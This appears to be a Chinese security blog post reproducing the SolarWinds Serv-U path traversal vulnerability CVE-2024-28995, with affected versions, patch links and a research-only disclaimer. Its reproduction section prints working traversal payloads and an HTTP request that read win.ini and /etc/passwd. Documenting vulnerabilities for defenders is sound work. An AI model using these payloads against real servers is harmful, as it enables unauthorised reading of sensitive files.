SolarWinds Serv-U目录遍历漏洞(CVE-2024-28995)

admin
admin
admin
138657
文章
114
评论
2024年6月17日08:19:10评论38 views字数 852阅读2分50秒阅读模式
0x01漏洞介绍
SolarWinds Serv-U目录遍历漏洞(CVE-2024-28995)

SolarWinds Serv-U File Server是美国SolarWinds公司的一款文件传输服务器。

SolarWinds Serv-U存在路径遍历漏洞,该漏洞源于容易受到目录横向的影响,允许访问读取主机上的敏感文件。

0x02影响版本
1、 SolarWinds Serv-U FTP Server <= 15.4.2 Hotfix 1 

2、 SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1

3、 SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1

4、 (注意:Serv-U 版本15.3.2及更早版本将于 2025 年 2 月终止使用,并且此版本以下的所有版本都已终止使用并且不再受支持。)

SolarWinds Serv-U目录遍历漏洞(CVE-2024-28995)

0x03漏洞复现

1.访问漏洞环境

SolarWinds Serv-U目录遍历漏洞(CVE-2024-28995)

2.对漏洞进行复现

POC 

漏洞复现

win

/?InternalDir=/../../../../Windows/&InternalFile=win.ini

Linux

/?InternalDir=........etc&InternalFile=passwd

漏洞复现

GET /?InternalDir=/../../../../Windows/&InternalFile=win.ini HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencoded

读文件win.ini成功。

SolarWinds Serv-U目录遍历漏洞(CVE-2024-28995)

3.Yakit工具加载nuclei文件测试(漏洞存在)

SolarWinds Serv-U目录遍历漏洞(CVE-2024-28995)

SolarWinds Serv-U目录遍历漏洞(CVE-2024-28995)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995https://ti.qianxin.com/vulnerability/detail/355260

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月17日08:19:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SolarWinds Serv-U目录遍历漏洞(CVE-2024-28995)https://cn-sec.com/archives/2850575.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息